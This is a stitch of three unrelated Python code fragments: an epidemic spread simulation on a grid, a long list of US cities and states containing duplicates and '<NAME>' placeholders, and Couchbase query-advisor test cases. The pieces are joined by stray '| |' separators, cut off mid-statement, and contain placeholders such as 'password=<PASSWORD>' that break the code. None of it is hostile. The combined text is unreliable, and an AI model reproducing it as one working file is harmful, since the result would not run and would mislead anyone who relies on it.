#Check if the infection is over, if it is, heal the person
elif self.days_infected == simulation.infection_duration:
self.heal()
class Population():
"""A class to model a whole population of Person objects"""
def __init__(self, simulation):
"""Initialize attributes"""
#This will be a list of N lists, where N is the simulation grid size.
#Each list within the list will represent a row in an NxN grid.
#Each element of the row will represent an individual Person object.
#Each of these lists will hold N Person objects and there will be N lists.
self.population = [] #A list to hold all Persons in the population.
#Loop through the needed number of rows
for i in range(simulation.grid_size):
row = []
#Loop through the needed number of Person objects for each row
for j in range(simulation.grid_size):
person = Person()
row.append(person)
#The entire row is complete, append it to the population
self.population.append(row)
def initial_infection(self, simulation):
"""Infect an initial portion of the population based on initial conditions of the sim"""
#Infect the infection_percent*population_size gives the total number to infect
#Round to 0 decimals and cast to int so it can be used in a loop.
infected_count = int(round(simulation.infection_percent*simulation.population_size, 0))
infections = 0
#Infect the population until you have infected the correct starting amount
while infections < infected_count:
#x is a random row in the population, y is a random person in the random row
#self.population[x][y] represents a random person in the population list
x = random.randint(0, simulation.grid_size - 1)
y = random.randint(0, simulation.grid_size - 1)
#If the person is not infected, infect them!
if not self.population[x][y].is_infected:
self.population[x][y].is_infected = True
self.population[x][y].days_infected = 1
infections += 1
def spread_infection(self, simulation):
"""Spread the infection in a 2D array to all adjacent people to a given person.
A given person in the population attribute is referenced as self.population[i][j]
A person to the right of the given person is referenced as self.population[i][j+1]
A person to the left of the given person is referenced as self.population[i][j-1]
A person below the given person is referenced as self.population[i+1][j]
A person above the given person is referenced as self.population[i-1][j]"""
#Loop through all rows of the population
for i in range(simulation.grid_size):
#Loop through all of the Person objects in a given row
for j in range(simulation.grid_size):
#Check to see if this given person self.population[i][j] is not dead
if self.population[i][j].is_dead == False:
#Check to see if we need to infect this person.
#We will try infect the given person if an adjacent person is already infected
#If i == 0, we are in the first row so, we can't look above
if i == 0:
#If j == 0, we are in the first column, so we can't look left.
if j == 0:
if self.population[i][j+1].is_infected or self.population[i+1][j].is_infected:
self.population[i][j].infect(simulation)
#If we are in the last column, we can't look right
elif j == simulation.grid_size-1:
if self.population[i][j-1].is_infected or self.population[i+1][j].is_infected:
self.population[i][j].infect(simulation)
#If we are in any other column, we can look left, right, or below
else:
if self.population[i][j-1].is_infected or self.population[i][j+1].is_infected or self.population[i+1][j].is_infected:
self.population[i][j].infect(simulation)
#If i == simulation.grid_size -1 we are in the last row, so we can't look below
elif i == simulation.grid_size-1:
#If j == 0, we are in the first column, so we can't look left.
if j == 0:
if self.population[i][j+1].is_infected or self.population[i-1][j].is_infected:
self.population[i][j].infect(simulation)
#If we are in the last column, we can't look right
elif j == simulation.grid_size-1:
if self.population[i][j-1].is_infected or self.population[i-1][j].is_infected:
self.population[i][j].infect(simulation)
#If we are in any other column, we can look left, right, or above
else:
if self.population[i][j-1].is_infected or self.population[i][j+1].is_infected or self.population[i-1][j].is_infected:
self.population[i][j].infect(simulation)
#Otherwise, we are in a row in between, we can look left, right, below or above
else:
#If j == 0, we are in the first column, so we can't look left.
if j == 0:
if self.population[i][j+1].is_infected or self.population[i+1][j].is_infected or self.population[i-1][j].is_infected:
self.population[i][j].infect(simulation)
#If we are in the last column, we can't look right
elif j == simulation.grid_size-1:
if self.population[i][j-1].is_infected or self.population[i+1][j].is_infected or self.population[i-1][j].is_infected:
self.population[i][j].infect(simulation)
#If we are in any other column, we can look left, right, below, or above
else:
if self.population[i][j-1].is_infected or self.population[i][j+1].is_infected or self.population[i+1][j].is_infected or self.population[i-1][j].is_infected:
self.population[i][j].infect(simulation)
def update(self, simulation):
"""Update the whole population by updating each individual Person"""
simulation.day_number += 1
#Loop through the population to access each row
for row in self.population:
#Loop through the row to update each Person
for person in row:
person.update(simulation)
def display_statistics(self, simulation):
"""Display the statistics of the population"""
#Initialize values
total_infected_count = 0
total_death_count = 0
#Loop through the population to access each row
for row in self.population:
#Loop through the row to access each person
for person in row:
#Person is infected
if person.is_infected:
total_infected_count += 1
#Person is dead
if person.is_dead:
total_death_count += 1
#Calculate percentage of population that is infected and dead
infected_percent = round(100*(total_infected_count/simulation.population_size), 4)
death_percent = round(100*(total_death_count/simulation.population_size), 4)
#Statistics summary
print("\n-----Day # " + str(simulation.day_number) + "-----")
print("Percentage of Population Infected: " + str(infected_percent) + "%")
print("Percentage of Population Dead: " + str(death_percent) + "%")
print("Total People Infected: " + str(total_infected_count) + " / " + | |
'Colorado'},
{'city': 'Cranford', 'state': 'New Jersey'},
{'city': 'Cranston', 'state': 'Rhode Island'},
{'city': 'Crawford', 'state': 'New York'},
{'city': 'Crawfordsville', 'state': 'Indiana'},
{'city': 'Cresskill', 'state': 'New Jersey'},
{'city': 'Crest Hill', 'state': 'Illinois'},
{'city': 'Crestline', 'state': 'California'},
{'city': 'Creston', 'state': 'Iowa'},
{'city': 'Crestview', 'state': 'Florida'},
{'city': 'Crestwood', 'state': 'Illinois'},
{'city': 'Crestwood', 'state': 'Missouri'},
{'city': 'Crestwood Village', 'state': 'New Jersey'},
{'city': 'Crete', 'state': 'Nebraska'},
{'city': 'Crete', 'state': 'Illinois'},
{'city': 'Creve Coeur', 'state': 'Missouri'},
{'city': 'Crockett', 'state': 'Texas'},
{'city': 'Crofton', 'state': 'Maryland'},
{'city': 'Cromwell', 'state': 'Connecticut'},
{'city': 'Crookston', 'state': 'Minnesota'},
{'city': 'Cross Lanes', 'state': 'West Virginia'},
{'city': 'Crossett', 'state': 'Arkansas'},
{'city': 'Crossville', 'state': 'Tennessee'},
{'city': 'Croton-on-Hudson', 'state': 'New York'},
{'city': 'Crowley', 'state': 'Texas'},
{'city': 'Crowley', 'state': 'Louisiana'},
{'city': 'Crown Point', 'state': 'Indiana'},
{'city': 'Croydon', 'state': 'Pennsylvania'},
{'city': 'Crystal', 'state': 'Minnesota'},
{'city': 'Crystal City', 'state': 'Texas'},
{'city': 'Crystal Lake', 'state': 'Illinois'},
{'city': 'Cudahy', 'state': 'California'},
{'city': 'Cudahy', 'state': 'Wisconsin'},
{'city': 'Cuero', 'state': 'Texas'},
{'city': 'Cullman', 'state': 'Alabama'},
{'city': 'Culpeper', 'state': 'Virginia'},
{'city': 'Culver City', 'state': 'California'},
{'city': 'Cumberland', 'state': 'Maine'},
{'city': 'Cumberland', 'state': 'Maryland'},
{'city': 'Cumberland', 'state': 'Rhode Island'},
{'city': 'Cumberland Hill', 'state': 'Rhode Island'},
{'city': 'Cupertino', 'state': 'California'},
{'city': 'Cushing', 'state': 'Oklahoma'},
{'city': 'Cutler', 'state': 'Florida'},
{'city': 'Cutler Ridge', 'state': 'Florida'},
{'city': 'Cutlerville', 'state': 'Michigan'},
{'city': 'Cuyahoga Falls', 'state': 'Ohio'},
{'city': 'Cynthiana', 'state': 'Kentucky'},
{'city': 'Cypress', 'state': 'California'},
{'city': 'Cypress Gardens', 'state': 'Florida'},
{'city': 'Cypress Lake', 'state': 'Florida'},
{'city': 'D’Iberville', 'state': 'Mississippi'},
{'city': 'Dade City', 'state': 'Florida'},
{'city': 'Dale City', 'state': 'Virginia'},
{'city': 'Dalhart', 'state': 'Texas'},
{'city': 'Dallas', 'state': 'Texas'},
{'city': 'Dallas', 'state': 'Oregon'},
{'city': 'Dalton', 'state': 'Massachusetts'},
{'city': 'Dalton', 'state': 'Georgia'},
{'city': 'Daly City', 'state': 'California'},
{'city': 'Damascus', 'state': 'Maryland'},
{'city': 'Dana Point', 'state': 'California'},
{'city': 'Danbury', 'state': 'Connecticut'},
{'city': 'Danbury', 'state': 'Connecticut'},
{'city': 'Dania Beach', 'state': 'Florida'},
{'city': 'Danvers', 'state': 'Massachusetts'},
{'city': 'Danvers', 'state': 'Massachusetts'},
{'city': 'Danville', 'state': 'California'},
{'city': 'Danville', 'state': 'Kentucky'},
{'city': 'Danville', 'state': 'Indiana'},
{'city': 'Danville', 'state': 'Illinois'},
{'city': 'Danville', 'state': 'Virginia'},
{'city': 'Daphne', 'state': 'Alabama'},
{'city': 'Darby', 'state': 'Pennsylvania'},
{'city': 'Darby Township', 'state': 'Pennsylvania'},
{'city': 'Darien', 'state': 'Connecticut'},
{'city': 'Darien', 'state': 'Connecticut'},
{'city': 'Darien', 'state': 'Illinois'},
{'city': 'Darlington', 'state': 'South Carolina'},
{'city': 'Darnestown', 'state': 'Maryland'},
{'city': 'Dartmouth', 'state': 'Massachusetts'},
{'city': 'Davenport', 'state': 'Iowa'},
{'city': 'Davidson', 'state': 'North Carolina'},
{'city': 'Davie', 'state': 'Florida'},
{'city': 'Davis', 'state': 'California'},
{'city': 'Dayton', 'state': 'Ohio'},
{'city': 'Dayton', 'state': 'New Jersey'},
{'city': 'Dayton', 'state': 'Tennessee'},
{'city': 'Daytona Beach', 'state': 'Florida'},
{'city': '<NAME>', 'state': 'Florida'},
{'city': 'De Land', 'state': 'Florida'},
{'city': 'De Pere', 'state': 'Wisconsin'},
{'city': 'De Ridder', 'state': 'Louisiana'},
{'city': 'De Soto', 'state': 'Missouri'},
{'city': 'De Witt', 'state': 'New York'},
{'city': 'Dearborn', 'state': 'Michigan'},
{'city': 'Dearborn Heights', 'state': 'Michigan'},
{'city': 'Decatur', 'state': 'Indiana'},
{'city': 'Decatur', 'state': 'Illinois'},
{'city': 'Decatur', 'state': 'Georgia'},
{'city': 'Decatur', 'state': 'Alabama'},
{'city': 'Decorah', 'state': 'Iowa'},
{'city': 'Dedham', 'state': 'Massachusetts'},
{'city': 'Dedham', 'state': 'Massachusetts'},
{'city': 'Deer Park', 'state': 'New York'},
{'city': 'Deer Park', 'state': 'Texas'},
{'city': 'Deerfield', 'state': 'Illinois'},
{'city': 'Deerfield Beach', 'state': 'Florida'},
{'city': 'Deerpark', 'state': 'New York'},
{'city': 'Defiance', 'state': 'Ohio'},
{'city': 'DeForest', 'state': 'Wisconsin'},
{'city': 'DeKalb', 'state': 'Illinois'},
{'city': 'Del Aire', 'state': 'California'},
{'city': 'Del City', 'state': 'Oklahoma'},
{'city': 'Del Rio', 'state': 'Texas'},
{'city': 'Delafield', 'state': 'Wisconsin'},
{'city': 'Delafield', 'state': 'Wisconsin'},
{'city': 'Delano', 'state': 'California'},
{'city': 'Delavan', 'state': 'Wisconsin'},
{'city': 'Delaware', 'state': 'Ohio'},
{'city': 'Delhi', 'state': 'California'},
{'city': 'Delmar', 'state': 'New York'},
{'city': 'Delphos', 'state': 'Ohio'},
{'city': 'Delray Beach', 'state': 'Florida'},
{'city': 'Delta', 'state': 'Colorado'},
{'city': 'Deltona', 'state': 'Florida'},
{'city': 'Deming', 'state': 'New Mexico'},
{'city': 'Demopolis', 'state': 'Alabama'},
{'city': 'Denham Springs', 'state': 'Louisiana'},
{'city': 'Denison', 'state': 'Iowa'},
{'city': 'Denison', 'state': 'Texas'},
{'city': 'Dennis', 'state': 'Massachusetts'},
{'city': 'Dent', 'state': 'Ohio'},
{'city': 'Denton', 'state': 'Texas'},
{'city': 'Dentsville', 'state': 'South Carolina'},
{'city': 'Denver', 'state': 'Colorado'},
{'city': 'Depew', 'state': 'New York'},
{'city': 'Derby', 'state': 'Colorado'},
{'city': 'Derby', 'state': 'Connecticut'},
{'city': 'Derby', 'state': 'Connecticut'},
{'city': 'Derby', 'state': 'Kansas'},
{'city': 'Derry', 'state': 'New Hampshire'},
{'city': 'Derry', 'state': 'New Hampshire'},
{'city': 'Des Moines', 'state': 'Iowa'},
{'city': 'Des Moines', 'state': 'Washington'},
{'city': 'Des Peres', 'state': 'Missouri'},
{'city': 'Des Plaines', 'state': 'Illinois'},
{'city': 'Desert Hot Springs', 'state': 'California'},
{'city': 'DeSoto', 'state': 'Texas'},
{'city': 'Destin', 'state': 'Florida'},
{'city': 'Destrehan', 'state': 'Louisiana'},
{'city': 'Detroit', 'state': 'Michigan'},
{'city': 'Detroit Lakes', 'state': 'Minnesota'},
{'city': 'Devils Lake', 'state': 'North Dakota'},
{'city': 'Dewey-Humboldt', 'state': 'Arizona'},
{'city': 'Dexter', 'state': 'Missouri'},
{'city': 'Diamond Bar', 'state': 'California'},
{'city': 'Dickinson', 'state': 'North Dakota'},
{'city': 'Dickinson', 'state': 'Texas'},
{'city': 'Dickson', 'state': 'Tennessee'},
{'city': '<NAME>', 'state': 'Pennsylvania'},
{'city': 'Dighton', 'state': 'Massachusetts'},
{'city': 'Dillon', 'state': 'South Carolina'},
{'city': 'Dinuba', 'state': 'California'},
{'city': 'Discovery Bay', 'state': 'California'},
{'city': 'Dishman', 'state': 'Washington'},
{'city': 'Dix Hills', 'state': 'New York'},
{'city': 'Dixon', 'state': 'California'},
{'city': 'Dixon', 'state': 'Illinois'},
{'city': '<NAME>', 'state': 'New York'},
{'city': 'Dock Junction', 'state': 'Georgia'},
{'city': '<NAME>', 'state': 'Florida'},
{'city': 'Dodge City', 'state': 'Kansas'},
{'city': 'Dolton', 'state': 'Illinois'},
{'city': 'Donaldsonville', 'state': 'Louisiana'},
{'city': 'Donna', 'state': 'Texas'},
{'city': 'Doral', 'state': 'Florida'},
{'city': 'Doraville', 'state': 'Georgia'},
{'city': 'Dormont', 'state': 'Pennsylvania'},
{'city': 'Dothan', 'state': 'Alabama'},
{'city': 'Douglas', 'state': 'Arizona'},
{'city': 'Douglas', 'state': 'Georgia'},
{'city': 'Douglas', 'state': 'Massachusetts'},
{'city': 'Douglasville', 'state': 'Georgia'},
{'city': 'Dover', 'state': 'Delaware'},
{'city': 'Dover', 'state': 'New Hampshire'},
{'city': 'Dover', 'state': 'New York'},
{'city': 'Dover', 'state': 'New Jersey'},
{'city': 'Dover', 'state': 'Ohio'},
{'city': 'Dowagiac', 'state': 'Michigan'},
{'city': 'Downers Grove', 'state': 'Illinois'},
{'city': 'Downey', 'state': 'California'},
{'city': 'Downingtown', 'state': 'Pennsylvania'},
{'city': 'Doylestown', 'state': 'Pennsylvania'},
{'city': 'Dracut', 'state': 'Massachusetts'},
{'city': 'Draper', 'state': 'Utah'},
{'city': 'Drexel Heights', 'state': 'Arizona'},
{'city': 'Drexel Hill', 'state': 'Pennsylvania'},
{'city': 'Dr<NAME>', 'state': 'Georgia'},
{'city': 'Dry Run', 'state': 'Ohio'},
{'city': 'Dryden', 'state': 'New York'},
{'city': 'Du Quoin', 'state': 'Illinois'},
{'city': 'Duarte', 'state': 'California'},
{'city': 'Dublin', 'state': 'California'},
{'city': 'Dublin', 'state': 'Georgia'},
{'city': 'Dublin', 'state': 'Ohio'},
{'city': 'DuBois', 'state': 'Pennsylvania'},
{'city': 'Dubuque', 'state': 'Iowa'},
{'city': 'Dudley', 'state': 'Massachusetts'},
{'city': 'Duluth', 'state': 'Minnesota'},
{'city': 'Duluth', 'state': 'Georgia'},
{'city': 'Dumas', 'state': 'Texas'},
{'city': 'Dumbarton', 'state': 'Virginia'},
{'city': 'Dumont', 'state': 'New Jersey'},
{'city': 'Dunbar', 'state': 'West Virginia'},
{'city': 'Duncan', 'state': 'Oklahoma'},
{'city': 'Duncanville', 'state': 'Texas'},
{'city': 'Dundalk', 'state': 'Maryland'},
{'city': 'Dunedin', 'state': 'Florida'},
{'city': 'Dunellen', 'state': 'New Jersey'},
{'city': 'Dunkirk', 'state': 'New York'},
{'city': 'Dunmore', 'state': 'Pennsylvania'},
{'city': 'Dunn', 'state': 'North Carolina'},
{'city': 'Dunn Loring', 'state': 'Virginia'},
{'city': 'Dunwoody', 'state': 'Georgia'},
{'city': 'Duquesne', 'state': 'Pennsylvania'},
{'city': 'Durango', 'state': 'Colorado'},
{'city': 'Durant', 'state': 'Oklahoma'},
{'city': 'Durham', 'state': 'Connecticut'},
{'city': 'Durham', 'state': 'North Carolina'},
{'city': 'Durham', 'state': 'New Hampshire'},
{'city': 'Durham', 'state': 'New Hampshire'},
{'city': 'Duxbury', 'state': 'Massachusetts'},
{'city': 'Dyer', 'state': 'Indiana'},
{'city': 'Dyersburg', 'state': 'Tennessee'},
{'city': 'Eagan', 'state': 'Minnesota'},
{'city': 'Eagle', 'state': 'Idaho'},
{'city': 'Eagle Mountain', 'state': 'Texas'},
{'city': 'Eagle Pass', 'state': 'Texas'},
{'city': 'Earlimart', 'state': 'California'},
{'city': 'Easley', 'state': 'South Carolina'},
{'city': 'East Alton', 'state': 'Illinois'},
{'city': 'East Aurora', 'state': 'New York'},
{'city': 'East Bethel', 'state': 'Minnesota'},
{'city': 'East Brainerd', 'state': 'Tennessee'},
{'city': 'East Bridgewater', 'state': 'Massachusetts'},
{'city': 'East Brunswick', 'state': 'New Jersey'},
{'city': 'East Chicago', 'state': 'Indiana'},
{'city': 'East Cleveland', 'state': 'Ohio'},
{'city': 'East Compton', 'state': 'California'},
{'city': 'East Falmouth', 'state': 'Massachusetts'},
{'city': 'East Fishkill', 'state': 'New York'},
{'city': 'East Foothills', 'state': 'California'},
{'city': 'East Glenville', 'state': 'New York'},
{'city': 'East Grand Forks', 'state': 'Minnesota'},
{'city': 'East Grand Rapids', 'state': 'Michigan'},
{'city': 'East Greenbush', 'state': 'New York'},
{'city': 'East Greenwich', 'state': 'Rhode Island'},
{'city': 'East Haddam', 'state': 'Connecticut'},
{'city': 'East Hampton', 'state': 'Connecticut'},
{'city': 'East Hampton', 'state': 'New York'},
{'city': 'East Hartford', 'state': 'Connecticut'},
{'city': 'East Hartford', 'state': 'Connecticut'},
{'city': 'East Haven', 'state': 'Connecticut'},
{'city': 'East Haven', 'state': 'Connecticut'},
{'city': 'East Hemet', 'state': 'California'},
{'city': 'East Highland Park', 'state': 'Virginia'},
{'city': 'East Hill-Meridian', 'state': 'Washington'},
{'city': 'East Hills', 'state': 'New York'},
{'city': 'East Islip', 'state': 'New York'},
{'city': 'East La Mirada', 'state': 'California'},
{'city': 'East Lake', 'state': 'Florida'},
{'city': 'East Lansing', 'state': 'Michigan'},
{'city': 'East Liverpool', 'state': 'Ohio'},
{'city': 'East Longmeadow', 'state': 'Massachusetts'},
{'city': 'East Los Angeles', 'state': 'California'},
{'city': 'East Lyme', 'state': 'Connecticut'},
{'city': 'East Massapequa', 'state': 'New York'},
{'city': 'East Meadow', 'state': 'New York'},
{'city': 'East Millcreek', 'state': 'Utah'},
{'city': 'East Moline', 'state': 'Illinois'},
{'city': 'East Norriton', 'state': 'Pennsylvania'},
{'city': 'East Northport', 'state': | |
close_txn:
start = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '15m'})", server=self.master)
session = start['results'][0]['$1']['session']
# Run query in transaction
results = self.run_cbq_query(query="BEGIN WORK", server=self.master)
query_params = {'txid': results['results'][0]['txid']}
results = self.run_cbq_query(query=query1, query_params=query_params, server=self.master)
results = self.run_cbq_query(query=rollback_or_commit, query_params=query_params, server=self.master)
# Stop and check session advise
stop = self.run_cbq_query(query="SELECT ADVISOR({{'action':'stop', 'session':'{0}'}}) as Stop".format(session), server=self.master)
get = self.run_cbq_query(query="SELECT ADVISOR({{'action':'get', 'session':'{0}'}}) as Get".format(session), server=self.master)
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
for statement in index['statements']:
self.assertEqual(statement['statement'], query1)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_negative_txn(self):
results = self.run_cbq_query(query="BEGIN WORK", server=self.master)
query_params = {'txid': results['results'][0]['txid']}
error = "advisor function is not supported within the transaction"
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '15m'})", query_params=query_params, server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_session_query_count(self):
query_lyon=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
query_grenoble=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "grenoble" AND country = "France"'
query_nice=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "nice" AND country = "France"'
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '15m', 'query_count': 6})", server=self.master)
session = start['results'][0]['$1']['session']
# Run 9 queries
results = self.run_cbq_query(query=query_lyon, server=self.master)
results = self.run_cbq_query(query=query_grenoble, server=self.master)
results = self.run_cbq_query(query=query_nice, server=self.master)
results = self.run_cbq_query(query=query_lyon, server=self.master)
results = self.run_cbq_query(query=query_grenoble, server=self.master)
results = self.run_cbq_query(query=query_lyon, server=self.master)
results = self.run_cbq_query(query=query_nice, server=self.master)
results = self.run_cbq_query(query=query_grenoble, server=self.master)
results = self.run_cbq_query(query=query_nice, server=self.master)
# Stop and check session advise. We should only see 6 queries count = 3*lyon + 2*grenoble + 1*nice
stop = self.run_cbq_query(query="SELECT ADVISOR({{'action':'stop', 'session':'{0}'}}) as Stop".format(session), server=self.master)
get = self.run_cbq_query(query="SELECT ADVISOR({{'action':'get', 'session':'{0}'}}) as Get".format(session), server=self.master)
queries_count = dict()
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
for query in index['statements']:
queries_count[query['statement']] = query['run_count']
self.assertEqual(queries_count[query_lyon], 3)
self.assertEqual(queries_count[query_grenoble], 2)
self.assertEqual(queries_count[query_nice], 1)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_get_active_session(self):
try:
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '5000s', 'query_count': 2 })", server=self.master)
session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
# Get session
get = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'get', 'session': '{0}'}}) as Get".format(session), server=self.master)
self.assertEqual(get['results'][0]['Get'], [])
# Abort session
abort = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'abort', 'session': '{0}'}})".format(session), server=self.master)
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status': 'all'}) as List", server=self.master)
self.assertEqual(results['results'][0]['List'],[])
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_negative_query_syntax_error(self):
query_syntax = f'SELECT airportname FROM `{self.bucket_name}` WERE type = \\"airport\\"'
error = "syntax error - at type"
try:
advise = self.run_cbq_query(query=f"SELECT ADVISOR(\"{query_syntax}\") as Advisor", server=self.master)
self.assertEqual(advise["results"][0]["Advisor"]["errors"][0]["error"], error)
self.assertEqual(advise["results"][0]["Advisor"]["errors"][0]["run_count"], 1)
self.assertEqual(advise["results"][0]["Advisor"]["errors"][0]["statement"], query_syntax.replace('\\',''))
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_negative_invalid_arg(self):
query = "SELECT ADVISOR({'action': 'start', 'duration': '10s', 'invalid': 10});"
error = "Error evaluating projection. - cause: Invalid arguments to Advisor() function: [invalid]"
try:
results = self.run_cbq_query(query=query, server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_negative_missing_arg(self):
query = "SELECT ADVISOR({'action': 'start', 'response': '10s'});"
error = "Error evaluating projection. - cause: advisor() not valid argument for 'duration'"
try:
results = self.run_cbq_query(query=query, server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_negative_array(self):
query=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
error = "Number of arguments to function ADVISOR must be 1. - at "
try:
results = self.run_cbq_query(query=f"SELECT ADVISOR('{query}','{query}')", server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_negative_invalid_value(self):
invalid_actions = [ \
{'cmd': {'action':'start', 'duration':'two'}, 'msg': 'Error evaluating projection. - cause: time: invalid duration two'}, \
{'cmd': {'action':'start', 'duration':'1hr'}, 'msg': 'Error evaluating projection. - cause: time: unknown unit hr in duration 1hr'}, \
{'cmd': {'action':'start', 'duration':'1h', 'response':'nul'}, 'msg': 'Error evaluating projection. - cause: time: invalid duration nul'}, \
{'cmd': {'action':'start', 'duration':'1h', 'response':'1sec'}, 'msg': 'Error evaluating projection. - cause: time: unknown unit sec in duration 1sec'}, \
{'cmd': {'action':'start', 'duration':'1h', 'query_count':'ten'}, 'msg': 'Error evaluating projection. - cause: advisor() not valid argument for \'query_count\''}, \
{'cmd': {'action':'start', 'duration':'1h', 'profile':9999}, 'msg': 'Error evaluating projection. - cause: advisor() not valid argument for \'profile\''} ]
for action in invalid_actions:
try:
session = self.run_cbq_query(query=f"SELECT ADVISOR({action['cmd']})", server=self.master)
except CBQError as ex:
self.assertTrue(str(ex).find(action['msg']) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_negative_list(self):
error = "Error evaluating projection. - cause: advisor() not valid argument for 'status'"
try:
session = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status':'stopped'})", server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_negative_missing_session(self):
error = "Error evaluating projection. - cause: advisor() not valid argument for 'session'"
try:
session = self.run_cbq_query(query="SELECT ADVISOR({'action':'get'})", server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_negative_invalid_session(self):
error = "Error evaluating projection. - cause: advisor() not valid argument for 'session'"
for action in ['get','purge','stop','abort']:
try:
session = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'{action}', 'session':123456}})", server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def run_async_query(self, query, username, password, server):
results = self.run_cbq_query(query=query, username=username, password=password, server=server)
# Check the query has been cancelled
self.assertEqual(results['status'], "stopped")
def test_session_query_cancel(self):
long_query = f"SELECT DISTINCT MIN(aport.airportname) AS Airport__Name, MIN(lmark.name) AS Landmark_Name, MIN(aport.tz) AS Landmark_Time FROM `{self.bucket_name}` aport LEFT JOIN `travel-sample` lmark ON aport.city = lmark.city AND lmark.country = 'United States' AND lmark.type = 'landmark' WHERE aport.type = 'airport' GROUP BY lmark.name ORDER BY lmark.name LIMIT 3"
self.users = [{"id": "jimDoe", "name": "<NAME>", "password": "<PASSWORD>"}]
self.create_users()
role = "admin"
user_id = self.users[0]['id']
user_pwd = self.users[0]['password']
grant = self.run_cbq_query(query=f"GRANT {role} to {user_id}",server=self.master)
cancel_query = f"DELETE FROM system:active_requests WHERE users = '{user_id}'"
# Create index for join query
create_index = f"CREATE INDEX `def_city` ON `{self.bucket_name}`(`city`)"
results = self.run_cbq_query(query=create_index,server=self.master)
th = threading.Thread(target=self.run_async_query,args=(long_query, user_id, user_pwd, self.master))
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '1h', 'query_count': 2 })", server=self.master)
session = start['results'][0]['$1']['session']
# Spawn query in a thread
th.start()
# Cancel query
self.sleep(1)
cancel = self.run_cbq_query(query=cancel_query,username=user_id, password=<PASSWORD>, server=self.master)
th.join()
# Stop and get session advise
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'stop', 'session': '{session}'}}) as Stop", server=self.master)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'get', 'session': '{session}'}}) as Get", server=self.master)
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
for statement in index['statements']:
self.assertEqual(statement['statement'], long_query)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_session_query_timeout(self):
long_query = f"SELECT DISTINCT MIN(aport.airportname) AS Airport__Name, MIN(lmark.name) AS Landmark_Name, MIN(aport.tz) AS Landmark_Time FROM `{self.bucket_name}` aport LEFT JOIN `travel-sample` lmark ON aport.city = lmark.city AND lmark.country = 'United States' AND lmark.type = 'landmark' WHERE aport.type = 'airport' GROUP BY lmark.name ORDER BY lmark.name LIMIT 3"
# Create index for join query
create_index = f"CREATE INDEX `def_city` ON `{self.bucket_name}`(`city`)"
results = self.run_cbq_query(query=create_index,server=self.master)
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '1h', 'query_count': 2 })", server=self.master)
session = start['results'][0]['$1']['session']
try:
results = self.run_cbq_query(query=long_query, query_params={'timeout':'500ms'}, server=self.master)
except CBQError as ex:
self.assertTrue(str(ex).find("Timeout 500ms exceeded") > 0)
# Stop and get session advise
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'stop', 'session': '{session}'}}) as Stop", server=self.master)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'get', 'session': '{session}'}}) as Get", server=self.master)
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
for statement in index['statements']:
self.assertEqual(statement['statement'], long_query)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_session_collection(self):
advise_index1 = "CREATE INDEX adv_lower_city_country ON `default`:`travel-sample`.`inventory`.`airport`(lower(`city`),`country`)"
advise_index2 = "CREATE INDEX adv_country_lower_city ON `default`:`travel-sample`.`inventory`.`airport`(`country`,lower(`city`))"
